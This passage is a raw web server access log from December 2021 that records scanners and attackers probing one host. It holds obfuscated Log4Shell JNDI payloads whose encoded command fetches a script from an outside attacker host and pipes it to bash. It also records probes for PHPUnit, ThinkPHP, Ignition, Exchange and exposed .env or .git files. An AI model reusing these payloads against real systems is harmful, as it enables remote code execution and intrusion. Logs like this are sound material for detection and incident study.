"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [21/Dec/2021:08:03:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Dec/2021:08:03:58 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.207.140] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Dec/2021:08:11:32 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 34.96.130.14] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [21/Dec/2021:08:12:25 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.213.65] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Dec/2021:08:21:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.248.174.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [21/Dec/2021:09:13:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.248.174.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [21/Dec/2021:10:14:12 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [21/Dec/2021:11:29:55 +0000] 444 - GET https mta1.moralanimal.net "/" [Client 34.86.35.6] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [21/Dec/2021:11:58:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.233.62.116] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [21/Dec/2021:12:10:39 +0000] 444 - GET https localhost "/" [Client 80.82.77.235] [Length 0] [Gzip -] "-" "-" [21/Dec/2021:12:11:09 +0000] 400 - GET http www "/" [Client 80.82.77.235] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0" "-" [21/Dec/2021:12:43:11 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.200.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Dec/2021:12:45:25 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.211.160] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Dec/2021:12:47:07 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.213.113] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Dec/2021:12:52:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Dec/2021:13:12:00 +0000] 400 - GET http 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [21/Dec/2021:13:23:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.212.249] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Dec/2021:13:48:14 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [21/Dec/2021:13:48:14 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [21/Dec/2021:14:14:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 51.158.98.24] [Length 0] [Gzip -] "-" "-" [21/Dec/2021:14:14:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 51.158.98.24] [Length 0] [Gzip -] "-" "-" [21/Dec/2021:15:12:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Dec/2021:15:41:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.90.160.114] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Dec/2021:15:41:57 +0000] 444 - GET https 64.22.31.253 "/fuel" [Client 23.90.160.114] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Dec/2021:15:44:28 +0000] 444 - GET https localhost "/" [Client 80.82.77.235] [Length 0] [Gzip -] "-" "-" [21/Dec/2021:15:44:58 +0000] 400 - GET http www "/" [Client 80.82.77.235] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0" "-" [21/Dec/2021:15:57:19 +0000] 444 - GET https localhost "/" [Client 80.82.77.235] [Length 0] [Gzip -] "-" "-" [21/Dec/2021:15:57:49 +0000] 400 - GET http www "/" [Client 80.82.77.235] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0" "-" [21/Dec/2021:16:15:41 +0000] 444 - GET https mailrelay.moralanimal.net "/" [Client 34.77.162.3] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [21/Dec/2021:18:27:19 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Dec/2021:19:33:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Dec/2021:19:35:02 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Dec/2021:19:53:42 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Dec/2021:20:58:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.43] [Length 0] [Gzip -] "-" "-" [21/Dec/2021:20:58:40 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.43] [Length 252] [Gzip -] "-" "-" [21/Dec/2021:21:25:12 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.50.223] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [21/Dec/2021:22:15:54 +0000] 400 - - http localhost "-" [Client 31.207.47.5] [Length 154] [Gzip -] "-" "-" [21/Dec/2021:22:20:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.57] [Length 0] [Gzip -] "-" "-" [21/Dec/2021:22:20:30 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.57] [Length 252] [Gzip -] "-" "-" [21/Dec/2021:22:20:30 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/" [Client 162.142.125.57] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [21/Dec/2021:22:23:08 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Dec/2021:22:34:55 +0000] 444 - GET https localhost "/" [Client 45.79.191.232] [Length 0] [Gzip -] "-" "-" [21/Dec/2021:22:34:55 +0000] 444 - OPTIONS https localhost "/" [Client 45.79.191.232] [Length 0] [Gzip -] "-" "-" [21/Dec/2021:22:34:55 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 45.79.191.232] [Length 0] [Gzip -] "-" "-" [21/Dec/2021:22:34:55 +0000] 400 - - https localhost "-" [Client 45.79.191.232] [Length 154] [Gzip -] "-" "-" [21/Dec/2021:22:35:00 +0000] 400 - - https localhost "-" [Client 45.79.191.232] [Length 0] [Gzip -] "-" "-" [21/Dec/2021:22:35:00 +0000] 400 - - https localhost "-" [Client 45.79.191.232] [Length 154] [Gzip -] "-" "-" [21/Dec/2021:22:35:01 +0000] 400 - - https localhost "-" [Client 45.79.191.232] [Length 154] [Gzip -] "-" "-" [21/Dec/2021:22:35:01 +0000] 400 - - https localhost "-" [Client 45.79.191.232] [Length 154] [Gzip -] "-" "-" [21/Dec/2021:22:35:01 +0000] 400 - - https localhost "-" [Client 45.79.191.232] [Length 154] [Gzip -] "-" "-" [21/Dec/2021:22:35:01 +0000] 400 - - https localhost "-" [Client 45.79.191.232] [Length 154] [Gzip -] "-" "-" [21/Dec/2021:22:35:01 +0000] 400 - - https localhost "-" [Client 45.79.191.232] [Length 154] [Gzip -] "-" "-" [21/Dec/2021:22:40:05 +0000] 400 - - http localhost "-" [Client 172.104.153.110] [Length 154] [Gzip -] "-" "-" [21/Dec/2021:22:59:00 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/nmaplowercheck1640127506" [Client 45.79.191.232] [Length 0] [Gzip -] "\x22Mozilla/5.0" "-" [21/Dec/2021:22:59:00 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/nmaplowercheck1640127506" [Client 45.79.191.232] [Length 252] [Gzip -] "\x22Mozilla/5.0" "-" [21/Dec/2021:22:59:00 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/evox/about" [Client 45.79.191.232] [Length 0] [Gzip -] "\x22Mozilla/5.0" "-" [21/Dec/2021:22:59:01 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/evox/about" [Client 45.79.191.232] [Length 252] [Gzip -] "\x22Mozilla/5.0" "-" [21/Dec/2021:22:59:15 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/HNAP1" [Client 45.79.191.232] [Length 0] [Gzip -] "\x22Mozilla/5.0" "-" [21/Dec/2021:22:59:15 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/HNAP1" [Client 45.79.191.232] [Length 252] [Gzip -] "\x22Mozilla/5.0" "-" [21/Dec/2021:23:09:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Dec/2021:23:16:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 101.36.110.226] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 8.1; EML-L29 Build/HUAWEIEML-L29; xx-xx) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/65.0.3325.109 Mobile Safari/537.36 (iPad; iPhone; CPU iPhone OS 13_2_3 like Mac OS X)" "-" [21/Dec/2021:23:20:30 +0000] 444 - GET https 64.22.31.253 "/ReportServer" [Client 192.241.213.134] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Dec/2021:23:33:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 92.118.160.29] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [21/Dec/2021:23:39:38 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Dec/2021:23:40:12 +0000] 444 - GET https 64.22.31.253 "/login" [Client 192.241.208.9] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Dec/2021:23:41:11 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.123] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [22/Dec/2021:00:59:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Dec/2021:01:10:44 +0000] 444 - GET https zmail.moralanimal.net "/" [Client 34.96.130.30] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [22/Dec/2021:01:25:05 +0000] 444 - GET https mx0.moralanimal.net "/" [Client 34.86.35.18] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [22/Dec/2021:01:28:19 +0000] 444 - GET https tw.moralanimal.net "/" [Client 34.86.35.7] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [22/Dec/2021:01:31:35 +0000] 444 - GET https mailer.moralanimal.net "/" [Client 34.96.130.1] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [22/Dec/2021:01:52:04 +0000] 444 - GET https ns2.moralanimal.net "/" [Client 34.96.130.9] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [22/Dec/2021:02:17:42 +0000] 400 - POST https localhost "-" [Client 195.54.160.149] [Length 154] [Gzip -] "-" "-" [22/Dec/2021:02:38:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Dec/2021:03:23:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 88.0.214.160] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Dec/2021:03:29:31 +0000] 444 - GET https 64.22.31.253 "/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [Client 195.54.160.149] [Length 0] [Gzip -] "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [22/Dec/2021:04:09:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Dec/2021:05:34:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [22/Dec/2021:06:01:10 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.214.143] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Dec/2021:07:22:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.14.97.147] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" [22/Dec/2021:07:22:19 +0000] 400 - - https localhost "-" [Client 5.255.97.211] [Length 154] [Gzip -] "-" "-" [22/Dec/2021:07:22:20 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 104.244.76.13] [Length 0] [Gzip -] "-" "-" [22/Dec/2021:07:22:22 +0000] 444 - OPTIONS https localhost "/" [Client 185.220.101.168] [Length 0] [Gzip -] "-" "-" [22/Dec/2021:07:22:29 +0000] 400 - - https localhost "-" [Client 185.220.101.168] [Length 154] [Gzip -] "-" "-" [22/Dec/2021:07:33:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 134.122.134.134] [Length 0] [Gzip -] "-" "-" [22/Dec/2021:07:33:06 +0000] 400 - - https localhost "-" [Client 134.122.134.134] [Length 154] [Gzip -] "-" "-" [22/Dec/2021:07:33:07 +0000] 400 - - http localhost "-" [Client 134.122.134.134] [Length 154] [Gzip -] "-" "-" [22/Dec/2021:07:33:08 +0000] 400 - - http localhost "-" [Client 134.122.134.134] [Length 154] [Gzip -] "-" "-" [22/Dec/2021:07:33:17 +0000] 400 - - https localhost "-" [Client 134.122.134.134] [Length 0] [Gzip -] "-" "-" [22/Dec/2021:07:37:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.83.64.10] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [22/Dec/2021:08:05:50 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.214.208] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Dec/2021:08:17:38 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.211.188] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Dec/2021:08:25:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Dec/2021:08:37:51 +0000] 444 - GET https 64.22.31.253 "/.git/config" [Client 193.169.255.41] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" "-" [22/Dec/2021:09:53:47 +0000] 400 - - http localhost "-" [Client 185.100.87.54] [Length 154] [Gzip -] "-" "-" [22/Dec/2021:09:57:18 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/" [Client 194.48.199.78] [Length 0] [Gzip -] "curl/7.64.1" "-" [22/Dec/2021:10:22:26 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.50.223] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [22/Dec/2021:11:29:31 +0000] 400 - OPTIONS http 64.22.31.253 "/" [Client 181.214.206.132] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36" "-" [22/Dec/2021:11:48:23 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Dec/2021:11:48:24 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Dec/2021:12:41:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 130.211.54.158] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [22/Dec/2021:13:09:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 65.49.20.68] [Length 0] [Gzip -] "-" "-" [22/Dec/2021:13:26:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.202.187] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Dec/2021:13:58:42 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Dec/2021:14:46:37 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Dec/2021:15:12:07 +0000] 444 - GET https localhost "/" [Client 47.243.5.86] [Length 0] [Gzip -] "-" "-" [22/Dec/2021:15:12:08 +0000] 444 - OPTIONS https localhost "/" [Client 47.243.5.86] [Length 0] [Gzip -] "-" "-" [22/Dec/2021:15:12:09 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 47.243.5.86] [Length 0] [Gzip -] "-" "-" [22/Dec/2021:15:12:10 +0000] 400 - - http localhost "-" [Client 47.243.5.86] [Length 154] [Gzip -] "-" "-" [22/Dec/2021:15:12:15 +0000] 400 - - https localhost "-" [Client 47.243.5.86] [Length 0] [Gzip -] "-" "-" [22/Dec/2021:15:12:16 +0000] 400 - - http localhost "-" [Client 47.243.5.86] [Length 154] [Gzip -] "-" "-" [22/Dec/2021:15:12:17 +0000] 400 - - http localhost "-" [Client 47.243.5.86] [Length 154] [Gzip -] "-" "-" [22/Dec/2021:15:12:18 +0000] 400 - - http localhost "-" [Client 47.243.5.86] [Length 154] [Gzip -] "-" "-" [22/Dec/2021:15:12:18 +0000] 400 - - http localhost "-" [Client 47.243.5.86] [Length 154] [Gzip -] "-" "-" [22/Dec/2021:15:12:19 +0000] 400 - - http localhost "-" [Client 47.243.5.86] [Length 154] [Gzip -] "-" "-" [22/Dec/2021:15:12:20 +0000] 400 - - http localhost "-" [Client 47.243.5.86] [Length 154] [Gzip -] "-" "-" [22/Dec/2021:15:14:17 +0000] 444 - GET https 64.22.31.253 "/text4041640186056" [Client 47.243.5.86] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Dec/2021:15:14:17 +0000] 444 - GET https localhost "/" [Client 47.243.5.86] [Length 0] [Gzip -] "-" "-" [22/Dec/2021:15:14:17 +0000] 400 - GET http 64.22.31.253 "/text4041640186056" [Client 47.243.5.86] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Dec/2021:15:14:17 +0000] 400 - GET http localhost "/" [Client 47.243.5.86] [Length 252] [Gzip -] "-" "-" [22/Dec/2021:15:14:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.243.5.86] [Length 0] [Gzip -] "-" "-" [22/Dec/2021:15:14:18 +0000] 444 - GET https 64.22.31.253 "/HNAP1" [Client 47.243.5.86] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Dec/2021:15:14:18 +0000] 444 - GET https 64.22.31.253 "/evox/about" [Client 47.243.5.86] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Dec/2021:15:14:19 +0000] 400 - GET http 64.22.31.253 "/" [Client 47.243.5.86] [Length 252] [Gzip -] "-" "-" [22/Dec/2021:15:14:19 +0000] 400 - GET http 64.22.31.253 "/HNAP1" [Client 47.243.5.86] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Dec/2021:15:14:19 +0000] 400 - GET http 64.22.31.253 "/evox/about" [Client 47.243.5.86] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Dec/2021:15:14:20 +0000] 444 - POST https 64.22.31.253 "/sdk" [Client 47.243.5.86] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Dec/2021:15:14:20 +0000] 400 - POST http 64.22.31.253 "/sdk" [Client 47.243.5.86] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [22/Dec/2021:15:14:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.243.5.86] [Length 0] [Gzip -] "-" "-" [22/Dec/2021:15:14:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 47.243.5.86] [Length 0] [Gzip -] "curl/7.75.0" "-" [22/Dec/2021:16:14:07 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.213.113] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Dec/2021:16:17:57 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.207.72] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Dec/2021:16:18:13 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Dec/2021:16:19:04 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.194.12] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Dec/2021:16:29:56 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.50.223] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [22/Dec/2021:17:46:12 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [22/Dec/2021:18:23:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Dec/2021:18:27:34 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Dec/2021:19:22:37 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Dec/2021:20:05:50 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Dec/2021:20:41:56 +0000] 444 - GET https owa.moralanimal.net 